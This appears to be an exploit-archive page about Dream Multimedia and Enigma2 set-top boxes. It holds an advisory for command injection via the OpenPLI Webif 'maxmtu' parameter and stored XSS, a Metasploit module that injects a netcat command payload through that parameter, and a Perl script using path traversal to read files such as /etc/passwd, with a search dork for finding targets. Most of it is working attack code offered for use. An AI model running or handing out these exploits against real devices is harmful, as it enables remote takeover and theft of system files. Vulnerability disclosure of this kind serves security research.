###############################Device Name: OpenPLI - Dream Multimedia Box with OpenPLI softwareVendor of device: Dream MultimediaVendor of Software: OpenPLI Community============ Device Details: ============ Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011Firmware release 1.1.0, 27.01.2013FP Firmware 1.06Web Interface 6.0.4-Expert - PLi edition by [lite]More infos: http://openpli.org/============ Vulnerability Overview: ============ * OS Command Execution: parameter: maxmtuThe vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device.http://target-ip/cgi-bin/setConfigSe...2Flib%2FsqliteIt is possible to shorten the URL to the following:http://target-ip/cgi-bin/setConfigSe...=%26COMMAND%26There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it but you will get it * stored XSS:Box Control -> Configuration -> Webserver -> User, Password parameter: AuthUser, AuthPasswordBox Control -> Configuration -> Settings parameter: audiochannelspriorityInjecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.de/advisoriesTwitter: @s3cur1ty_de#####################





### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'OpenPLI Webif Arbitrary Command Execution', 'Description' => %q{ Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This module has been tested in a box with the next features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition). }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90230' ], [ 'BID', '57943' ], [ 'EDB', '24498' ], [ 'URL', 'http://openpli.org/wiki/Webif' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ] ], 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat generic' } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 08 2013' )) end def exploit print_status("#{rhost}:#{rport} - Sending remote command...") vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") begin send_request_cgi( { 'uri' => normalize_uri("cgi-bin", "setConfigSettings"), 'method' => 'GET', 'vars_get' => { "maxmtu" => "1500&#{payload.encoded}&" } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") end endend


#!/usr/bin/perl## Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit### Author: Todor Donev# Email me: todor.donev@@gmail.com# Platform: Linux# Type: remote### Gewgle Dork: "Enigma2 movielist" filetype:rss#### Enigma2 is a framebuffer-based zapping application (GUI) for linux.# It's targeted to real set-top-boxes, but would also work on regular PCs.# Enigma2 is based on the Python programming language with a backend# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.## Enigma2 can also be controlled via an Enigma2:WebInterface.### Thanks to Tsvetelina Emirska !!##use LWP::Simple;$t = $ARGV[0];if(! $t) {usg();}$d = $ARGV[1];if(! $d) {$d = "/etc/passwd";}my $r = get("http://$t/web/about") or exit;print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Target: $t\n";if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){print "[+] Image Version: $1\n";}if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";result(exploit1());}if ($r =~ (m/1.5rc1|1.5beta4/i)){print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";result(exploit2());}sub usg{print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Usage: perl enigma2.pl <victim> </path/file>\n";exit;}sub exploit1{my $x = get("http://$t/file?file=$d");}sub exploit2{my $x = get("http://$t/file/?file=../../../..$d");}sub result{my $x= shift;while(defined $x){print "$x\n";print "[+] I got it 4 cheap.. =)\n";exit;}}